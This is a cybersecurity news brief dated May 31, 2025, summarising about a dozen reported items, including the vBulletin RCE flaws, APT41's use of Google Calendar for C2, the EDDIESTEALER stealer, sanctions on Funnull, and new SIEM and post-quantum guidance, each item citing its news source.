Svoboda Cybersecurity Brief May 31, 2025
May 31, 2025bulletproof VPN - stay anonymous
U.S. Government Employee Arrested for Attempting to Provide Classified Information to Foreign Government
A Defense Intelligence Agency IT specialist, Nathan Vilas Laatsch, was arrested for attempting to transmit classified information to a foreign government. He allegedly transcribed and exfiltrated Top Secret documents over several days, using thumb drives and covert drop locations. The FBI intercepted the data and arrested him during a planned exchange.
Source: DataBreaches.net
ConnectWise Hit by Suspected State-Sponsored Cyberattack
ConnectWise disclosed a breach by a sophisticated nation-state actor, affecting a small number of ScreenConnect customers. The company engaged Mandiant and patched CVE-2025-3935, a high-severity ViewState code injection flaw, though it’s unclear if this was exploited. Enhanced monitoring and hardening measures were implemented.
Source: The Hacker News
Australian Government Mandates Ransomware Payment Reporting
Australia became the first country to require ransomware victims with annual turnover over AUS $3 million to report payments to cybercriminals within 72 hours. The law aims to track and disrupt ransomware economics but excludes smaller businesses.
Source: DataBreaches.net
U.S. Sanctions Funnull for Facilitating $200M Cryptocurrency Scams
The U.S. sanctioned Funnull Technology Inc., a Philippines-based CDN provider, for hosting pig butchering scam websites linked to $200M in losses. Funnull laundered traffic through U.S. cloud providers and used domain-generation algorithms (DGAs).
Source: KrebsOnSecurity
vBulletin Forum Software Exploited in Critical RCE Attacks
CVE-2025-48827 (CVSS 10.0) and CVE-2025-48828 (CVSS 9.0) allow unauthenticated RCE in vBulletin 5.0.0–5.7.5 and 6.0.0–6.0.3 via PHP Reflection API abuse. Public PoCs exist, and active exploitation was observed targeting the ajax/api/ad/replaceAdTemplate endpoint.
Impact: Attackers gain remote shell access via template engine abuse.
Mitigation: Upgrade to vBulletin 6.1.1 or apply patches (PL1 for v6.x, PL3 for v5.7.5).
Source: BleepingComputer
Law Enforcement Seizes AVCheck and Threat Actor Tools in Operation Endgame
AVCheck, a malware-testing service, and linked crypting services were seized by international law enforcement. The takedown disrupted ransomware groups using these tools to evade detection. The operation involved Dutch, Finnish, and U.S. agencies.
Source: BleepingComputer
APT41 Exploits Google Calendar for C2 in Government Attacks
Chinese group APT41 used ToughProgress malware with Google Calendar for C2, targeting governments via phishing links. The malware injected commands via Calendar events and exfiltrated data through encrypted event descriptions. Google disrupted the infrastructure.
Source: SecurityWeek
Earth Lamia Targets SAP and SQL Servers Across Asia
China-linked Earth Lamia exploited SAP NetWeaver CVE-2025-31324 and SQL injection flaws to breach logistics, retail, and government targets. The group deployed Cobalt Strike, Supershell, and custom backdoors like PULSEPACK. Recent attacks shifted focus to universities and IT firms.
Source: The Hacker News
Comstar LLC Settles with HHS Over Ransomware Breach Affecting 585K Patients
Comstar LLC agreed to a $75,000 fine and corrective action plan after a 2022 ransomware attack exposed ePHI of 585,621 individuals. HHS found the company failed to conduct proper risk analysis or update breach reports.
Source: DataBreaches.net
New EDDIESTEALER Malware Bypasses Chrome Encryption via ClickFix Campaign
EDDIESTEALER, a Rust-based infostealer, uses fake CAPTCHA pages to trick users into running PowerShell scripts. It steals browser data, crypto wallets, and bypasses Chrome’s app-bound encryption using a Rust implementation of ChromeKatz.
Source: The Hacker News
CISA and ACSC Release SIEM/SOAR Implementation Guidance
CISA and ACSC published guidance for organizations adopting SIEM/SOAR platforms, emphasizing log prioritization and integration. The documents target both executives and practitioners, focusing on improving incident detection and response.
Source: SecurityWeek
MITRE Publishes Post-Quantum Cryptography Migration Roadmap
The PQCC released a roadmap for transitioning to quantum-safe cryptography, outlining stages like preparation, planning, and monitoring. The guidance addresses risks from future quantum computing capabilities.
Source: SecurityWeek
Share this brief: https://svo.bz/QD4d
If you want to support us, you can donate here: Donate